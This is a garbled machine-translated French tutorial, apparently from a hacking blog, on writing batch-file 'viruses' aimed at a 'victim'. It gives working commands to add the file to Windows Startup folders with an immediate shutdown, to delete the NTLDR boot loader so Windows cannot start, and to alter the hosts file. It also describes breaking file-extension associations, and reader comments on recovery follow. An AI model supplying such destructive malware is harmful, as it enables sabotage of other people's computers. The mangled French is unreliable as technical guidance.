Fichiers batch - l'art de la création de virus, Tutoriels Ethical Hacking, comment pirater
copier anything.bat « C: \ Documents and Settings \ Administrateur \ Menu Démarrer \ Programmes \ Démarrage »
copier anything.bat « C: \ Documents and Settings \ All Users \ Menu Démarrer \ Programmes \ Démarrage » // ces deux commandes copie le fichier batch dans le démarrage des dossiers (sous XP)
arrêt -s -t 00 // cet arrêt de la volonté de l'ordinateur en 0 secondes
Remarque. Les fichiers dans le dossier Démarrage démarre automatiquement lorsque obtient Windows démarre. Vous devez deux premières lignes de code dans chaque code du virus afin qu'il se copier dans le dossier de démarrage. Mise en service le chemin du dossier dans Windows 7 est C: \ Users \ sys \ AppData \ Roaming \ Microsoft \ Windows \ Menu Démarrer \ Programmes \ Démarrage
Chaque fois que la victime démarrer l'ordinateur, le fichier de commandes dans démarrage et l'arrêt irait à l'ordinateur immédiatement. Vous pouvez supprimer ce virus en démarrant l'ordinateur en mode sans échec et la suppression du fichier de commandes à partir de Démarrer dossier Up.
4. Suppression de fichiers de démarrage
Aller lecteur C dans Windows XP. Outils-> Dossier Options-> Voir
Maintenant, désactivez l'option « Masquer les fichiers du système d'exploitation » et cocher l'option « Afficher les fichiers et dossiers cachés ». Cliquez sur appliquer
Maintenant, vous pouvez voir les fichiers du système d'exploitation. Il y a un fichier « NTLDR » qui est le chargeur de démarrage utilisé pour démarrer les fenêtres.
Permet de faire un fichier batch pour
supprimer ce fichier de l'ordinateur de la victime et les fenêtres ne démarre pas alors.
Caract -S -R -H C: \ ntldr // -S, -R, -H pour effacer l'attribut de fichier système, lire seul attribut. attribut de fichier caché respectivement
del NTLDR // supprimer le fichier NTLDR
Après l'exécution de ce fichier batch. le système ne redémarre pas et une victime normale serait certainement installer les fenêtres à nouveau.
Chaque extension est associée à un type de fichier comme l'extension « exe » est est associé à filetype « exefile ». Pour les voir, il suffit d'entrer la commande « assoc » dans l'invite de commande.
Au-dessus de code change l'association de certaines extensions filetype « quoi que ce soit » (signifie u peut écrire quoi que ce soit) qui évidemment n'existe pas. Donc tout exe (peinture, jeux, invite de commandes et beaucoup d'autres), jpeg, png, fichiers mpeg wudn't ouvrir correctement.
7. DNS Poisoning
echo xxx.xxx.xxx.xxx www.anything.com> C: \ windows \ system32 \ drivers \ etc \ hosts // cette commande imprime ou ajouter xxx.xxx.xxx.xxx. www.anything.com dans le fichier hosts.
Les virus que nous venons Codé
Si u supprimer ur NTLDR. puis d'abord copier ce fichier à partir de tout autre système de winows. Alors gardez cela à l'USB. Dans ur le démarrage du système tout (je préfère ubuntu) linux en direct cd.Dont installer que. Il suffit de démarrer à partir du CD live. Lorsque u voir bureau ubuntu. U peut trouver ur partitions de fenêtres theire. puis trouver ur dossier coorect dans c lecteur. coller ntdlr et redémarrez sysyem. Retirez cd linux. Vous pouvez voir ur vieilles fenêtres.
Bonjour, je l'ai écrit et couru le virus Extension Changer (double-cliqué par erreur) et que vous pouvez supposer, moi tous les fichiers ont été foiré. J'ai réussi à démarrer en mode sans échec et tout changer sauf pour les executables. Je l'ai fait en tapant assoc dans les modes de sécurité cmd puis je trouve toutes les extensions de fichiers concernés et écrit les bonnes. Ensuite, je les ai changé avec les éléments suivants: assoc .filetype = .file_extension. Cela a fonctionné pour tout sauf mes executables. S'il vous plaît aidez-moi, et désolé pour écrire tant. Je veux juste être sûr que j'ai donné assez d'informations.